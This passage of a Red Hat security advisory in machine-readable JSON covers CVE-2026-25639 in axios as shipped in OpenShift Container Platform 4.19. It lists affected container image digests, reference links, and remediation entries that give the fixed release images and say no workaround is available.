"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
